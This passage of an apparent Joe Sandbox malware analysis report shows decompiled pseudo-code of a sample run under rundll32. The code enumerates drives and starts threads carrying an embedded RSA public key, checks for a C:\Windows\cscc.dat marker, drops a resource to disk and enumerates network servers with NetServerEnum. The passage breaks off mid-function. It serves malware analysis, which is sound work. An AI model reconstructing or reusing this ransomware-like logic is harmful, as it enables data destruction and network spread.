                                                                                                                                                                                          • Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C39
                                                                                                                                                                                          • Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C3C
                                                                                                                                                                                          • Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C4E
                                                                                                                                                                                          • Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C51
                                                                                                                                                                                          • Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C56
                                                                                                                                                                                          • Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C59
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1652351593-0
                                                                                                                                                                                        • Opcode ID: 0c0c816fae249d5fa51e21ce182c9fbed799020e361758836466e62e0681f147
                                                                                                                                                                                        • Instruction ID: cf0c8bc80afb2d9a372eeabd846f22c5ac3286b118fd02786b030e6d8f64bbd8
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c0c816fae249d5fa51e21ce182c9fbed799020e361758836466e62e0681f147
                                                                                                                                                                                        • Instruction Fuzzy Hash: BE01FB71600719ABD324DFAADC54F5BBBE8FF48750F05461AFA89D7740DA78E8008BA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                        			E007B636B(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                        				signed char _v8;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				short _v14;
                                                                                                                                                                                        				short _v16;
                                                                                                                                                                                        				short _v18;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				short _t30;
                                                                                                                                                                                        				short _t31;
                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                        				void _t35;
                                                                                                                                                                                        				signed char _t36;
                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t35 =  *0x7c7bbc;
                                                                                                                                                                                        				_t24 = GetLogicalDrives(); // executed
                                                                                                                                                                                        				_v12 = _t24;
                                                                                                                                                                                        				_v8 = 0x1f;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t36 = _v8;
                                                                                                                                                                                        					_t27 = 1 << _t36;
                                                                                                                                                                                        					if((_v12 & 1) != 0) {
                                                                                                                                                                                        						_v20 = _t36 + 0x41;
                                                                                                                                                                                        						_t30 = 0x3a;
                                                                                                                                                                                        						_v18 = _t30;
                                                                                                                                                                                        						_t31 = 0x5c;
                                                                                                                                                                                        						_v16 = _t31;
                                                                                                                                                                                        						_v14 = 0;
                                                                                                                                                                                        						_t27 = GetDriveTypeW( &_v20); // executed
                                                                                                                                                                                        						if(_t27 == 3) {
                                                                                                                                                                                        							_t27 = LocalAlloc(0x40, 0x50);
                                                                                                                                                                                        							if(_t27 != 0) {
                                                                                                                                                                                        								 *((intOrPtr*)(_t27 + 0x4c)) = _a8;
                                                                                                                                                                                        								 *_t27 = _t35;
                                                                                                                                                                                        								 *(_t27 + 0x34) = L"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB";
                                                                                                                                                                                        								 *(_t27 + 4) = _v20;
                                                                                                                                                                                        								 *((intOrPtr*)(_t27 + 8)) = _v16;
                                                                                                                                                                                        								_t40 = 8;
                                                                                                                                                                                        								_t20 = _t27 + 0xc; // 0xc
                                                                                                                                                                                        								_t34 = memcpy(_t20, _a4, _t40 << 2);
                                                                                                                                                                                        								_t47 = _t47 + 0xc;
                                                                                                                                                                                        								asm("movsb"); // executed
                                                                                                                                                                                        								_t27 = CreateThread(0, 0, E007B6299, _t34, 0, 0); // executed
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t22 =  &_v8;
                                                                                                                                                                                        					 *_t22 = _v8 - 1;
                                                                                                                                                                                        				} while ( *_t22 >= 0);
                                                                                                                                                                                        				return _t27;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        0x007b6404
                                                                                                                                                                                        0x007b6404
                                                                                                                                                                                        0x007b63d1
                                                                                                                                                                                        0x007b63c1
                                                                                                                                                                                        0x007b640a
                                                                                                                                                                                        0x007b640a
                                                                                                                                                                                        0x007b640a
                                                                                                                                                                                        0x007b6417

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetLogicalDrives.KERNELBASE ref: 007B637A
                                                                                                                                                                                        • GetDriveTypeW.KERNELBASE(?), ref: 007B63B8
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000050), ref: 007B63C7
                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 007B6404
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2320387513-0
                                                                                                                                                                                        • Opcode ID: 3dca53d2cff93ec15b3229665706cd1ae63f38fb160106f9420f7a4cf7471b24
                                                                                                                                                                                        • Instruction ID: c868f63876435ac23b87158b2c64b065babf987cf377b77623cd04c113fd923f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dca53d2cff93ec15b3229665706cd1ae63f38fb160106f9420f7a4cf7471b24
                                                                                                                                                                                        • Instruction Fuzzy Hash: 57115C75A00208AFDB00DFA8D845EAEB7B5FF88710F15C46AE605EB291D7389A45CB54
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007BA333(void* __eflags, void* _a4) {
                                                                                                                                                                                        				short _v36;
                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t32 = __eflags;
                                                                                                                                                                                        				_t24 = _a4;
                                                                                                                                                                                        				Sleep( *_t24); // executed
                                                                                                                                                                                        				_t27 =  *0x7c7bb8;
                                                                                                                                                                                        				_t22 =  *0x7c7bb8;
                                                                                                                                                                                        				_t20 = E007B6B0E(_t27, _t32,  &_v36);
                                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t13 = E007B9F27( &_v36); // executed
                                                                                                                                                                                        						if(_t13 != 0) {
                                                                                                                                                                                        							_t22 =  &_v36;
                                                                                                                                                                                        							E007B6B5F( &_v36, _t27, _t20);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v36 = 0;
                                                                                                                                                                                        					} while (E007B6AD0(_t22,  &_v36) != 0);
                                                                                                                                                                                        					E007B6B46(_t20);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • Sleep.KERNELBASE(?), ref: 007BA344
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?), ref: 007BA399
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007BA3A0
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeProcessSleep
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1803097132-3175316637
                                                                                                                                                                                        • Opcode ID: 99d820d1101b4760679e0e4b304514107f090caa1c0bffdc9915b8c046f385f2
                                                                                                                                                                                        • Instruction ID: 679a4e88807e3692ce26d1d978d66cb3567bdf9726ded16b871b219055be2cee
                                                                                                                                                                                        • Opcode Fuzzy Hash: 99d820d1101b4760679e0e4b304514107f090caa1c0bffdc9915b8c046f385f2
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D012CB2504246ABC710EFB59C89EEBB7ACEB84310F044929BA15D3051EB28D914C7A6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 27%
                                                                                                                                                                                        			E007BA112(void* __ecx, void* _a4, void* _a7352) {
                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                        				void _v12;
                                                                                                                                                                                        				intOrPtr _t10;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                        				intOrPtr _t27;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t21 = _a4;
                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                        					_t31 =  *(_t21 + 4);
                                                                                                                                                                                        					_t27 =  *0x7c7b88;
                                                                                                                                                                                        					_v12 =  *_t21;
                                                                                                                                                                                        					_v8 =  *0x7c7bb8;
                                                                                                                                                                                        					_t10 =  *0x7c7b80;
                                                                                                                                                                                        					_t37 = _t10;
                                                                                                                                                                                        					if(_t10 == 0 || E007B9F7A(__ecx, _t37, _t31, _t10) == 0) {
                                                                                                                                                                                        						_t39 = _t27;
                                                                                                                                                                                        						if(_t27 == 0 || E007B98AB(_t39, _t31, _t27) == 0) {
                                                                                                                                                                                        							if(_v12 != 0) {
                                                                                                                                                                                        								_t16 = E007B9534(_t31, 0, 0, 0); // executed
                                                                                                                                                                                        								if(_t16 != 0) {
                                                                                                                                                                                        									goto L7;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						E007B6B5F(_t31, _v8, 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t31);
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t21);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007BA18B
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007BA194
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 007BA199
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007BA19C
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                        • Opcode ID: 2c2d78ee93ae6276c0319a679aa46fb3d21fd1a275e290a75c5714d769b0bef4
                                                                                                                                                                                        • Instruction ID: a233fe5160e543dfab55ce4a6f097cee206d3eff0bb945dc34cd5793f27e85dc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c2d78ee93ae6276c0319a679aa46fb3d21fd1a275e290a75c5714d769b0bef4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C11C2B26043197BD750BE6D9C44FAB77ACAB84320F004129FE14D3240EB28DD01CAB6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E007B7E8E(void* __ecx, void* __eflags) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				short _v1572;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t26 = __ecx;
                                                                                                                                                                                        				_t27 = 0;
                                                                                                                                                                                        				if(E007B7E69( &_v1572) == 0) {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					return _t27;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t12 = PathFileExistsW( &_v1572); // executed
                                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t16 = E007B6F7C(_t26, GetCurrentProcess());
                                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                                        				_t20 = E007B8313( ~( ~_t16) + 7,  &_v12,  &_v8); // executed
                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                        					_t22 = E007B87E7(_v8,  &_v1572, _v12); // executed
                                                                                                                                                                                        					_t27 = _t22;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                        			}














                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B7E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,007B7EA6,?), ref: 007B7E7C
                                                                                                                                                                                        • PathFileExistsW.KERNELBASE(?,?), ref: 007B7EB1
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?), ref: 007B7EC3
                                                                                                                                                                                          • Part of subcall function 007B6F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
                                                                                                                                                                                          • Part of subcall function 007B6F7C: GetProcAddress.KERNEL32(00000000), ref: 007B6F95
                                                                                                                                                                                          • Part of subcall function 007B8313: FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
                                                                                                                                                                                          • Part of subcall function 007B8313: LoadResource.KERNEL32(00000000), ref: 007B8341
                                                                                                                                                                                          • Part of subcall function 007B8313: LockResource.KERNEL32(00000000), ref: 007B8350
                                                                                                                                                                                          • Part of subcall function 007B8313: SizeofResource.KERNEL32(00000000), ref: 007B8368
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
                                                                                                                                                                                          • Part of subcall function 007B8313: memcpy.MSVCRT ref: 007B839C
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
                                                                                                                                                                                          • Part of subcall function 007B8313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
                                                                                                                                                                                          • Part of subcall function 007B8313: RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D
                                                                                                                                                                                          • Part of subcall function 007B87E7: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,007B11BB,?,?), ref: 007B87FC
                                                                                                                                                                                          • Part of subcall function 007B87E7: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,007B11BB,?,?), ref: 007B8813
                                                                                                                                                                                          • Part of subcall function 007B87E7: FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,007B11BB,?,?), ref: 007B8824
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 007B7EFD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Resource$File$AllocateFindPath$AddressChangeCloseCombineCreateCurrentExistsExitFreeHandleLoadLockModuleNotificationProcSizeofWritememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 706652641-0
                                                                                                                                                                                        • Opcode ID: a49e06a03efafaaf1370d65b9409bbf8852ff61f65512c713ddf6b322e46109b
                                                                                                                                                                                        • Instruction ID: 6c0469cba4452187a2c1dde95cb5430f5b17fa434865125b8702b3fae8f7b272
                                                                                                                                                                                        • Opcode Fuzzy Hash: a49e06a03efafaaf1370d65b9409bbf8852ff61f65512c713ddf6b322e46109b
                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F03C7690011DABEB20ABF4DC49FEE73ADAF48344F4441A1A901E2541EA3DDE05CAA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6FAF(long __ebx, long _a4, void* _a8) {
                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                        				int _t9;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				struct _OVERLAPPED* _t13;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t13 = 0;
                                                                                                                                                                                        				_t6 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                                                        				_t12 = _t6;
                                                                                                                                                                                        				if(_t12 != 0xffffffff) {
                                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                                        					_t9 = WriteFile(_t12, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                                                        					if(_t9 != 0 && __ebx == _a4) {
                                                                                                                                                                                        						_t13 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_t12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t13;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FC5
                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FDF
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,007B7201,?,?,?,007B7AF8), ref: 007B6FF0
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1065093856-0
                                                                                                                                                                                        • Opcode ID: 54e946d271c96938b6a41788f18478042b41647fe694e7c56ce0f38cfd5cdd79
                                                                                                                                                                                        • Instruction ID: 03f38730a8018321a8192a9a1e92d6ba77318000877ed62bbb3d6c616cd15c99
                                                                                                                                                                                        • Opcode Fuzzy Hash: 54e946d271c96938b6a41788f18478042b41647fe694e7c56ce0f38cfd5cdd79
                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F0DA352011247ADB305A66EC48FEB7E6CEB457F1F108112FA0D86190D638D941D6A0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B87E7(long __ebx, long _a4, void* _a8) {
                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				struct _OVERLAPPED* _t12;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t12 = 0;
                                                                                                                                                                                        				_t5 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                        				_t11 = _t5;
                                                                                                                                                                                        				if(_t11 != 0xffffffff) {
                                                                                                                                                                                        					_t8 = WriteFile(_t11, _a8, __ebx,  &_a4, 0); // executed
                                                                                                                                                                                        					if(_t8 != 0 && _a4 == __ebx) {
                                                                                                                                                                                        						_t12 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					FindCloseChangeNotification(_t11); // executed
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t12;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,007B11BB,?,?), ref: 007B87FC
                                                                                                                                                                                        • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,00000000,?,007B11BB,?,?), ref: 007B8813
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?,007B11BB,?,?), ref: 007B8824
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3805958096-0
                                                                                                                                                                                        • Opcode ID: a29bc4bf8c5f389ba2e4618ba3c5b58dfe40d0b420d48a0bd11e200db7115e29
                                                                                                                                                                                        • Instruction ID: 0f9770b92848537df736765d0663d4658546a0b9a54611f61192e35b67a9990e
                                                                                                                                                                                        • Opcode Fuzzy Hash: a29bc4bf8c5f389ba2e4618ba3c5b58dfe40d0b420d48a0bd11e200db7115e29
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BF01C32201024BBCB301E66EC4CFEBBE6CEF866F1B008225F90981060E634CD42D6E1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B751B(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void** _t30;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                        				intOrPtr* _t43;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t44 = 0;
                                                                                                                                                                                        				_t30 =  &_v8;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				__imp__NetServerEnum(0, 0x65, _t30, 0xffffffff,  &_v12,  &_v20, _a8, _a12,  &_v16); // executed
                                                                                                                                                                                        				if(_t30 == 0 || _t30 == 0xea) {
                                                                                                                                                                                        					_t42 = _v8;
                                                                                                                                                                                        					_a12 = 1;
                                                                                                                                                                                        					if(_t42 == _t44) {
                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t40 = 0;
                                                                                                                                                                                        					if(_v12 <= _t44) {
                                                                                                                                                                                        						L13:
                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t43 = _t42 + 4;
                                                                                                                                                                                        					while(_t43 != 4) {
                                                                                                                                                                                        						if(( *(_t43 + 0xc) & 0x80000000) == 0) {
